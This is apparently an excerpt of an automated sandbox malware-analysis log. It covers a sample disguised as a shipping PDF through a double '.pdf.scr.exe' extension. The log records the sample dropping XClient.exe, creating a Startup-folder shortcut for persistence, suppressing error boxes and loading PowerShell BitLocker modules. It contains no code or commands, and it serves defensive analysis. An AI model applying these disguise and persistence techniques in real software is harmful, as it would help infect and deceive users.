Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File created: \f41355 so 7670 hbl express releasepdf.pdf.scr.exe	Jump to behavior

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

File created: C:\Users\user\AppData\Roaming\XClient.exe

Jump to dropped file

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.scr

Static PE information: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
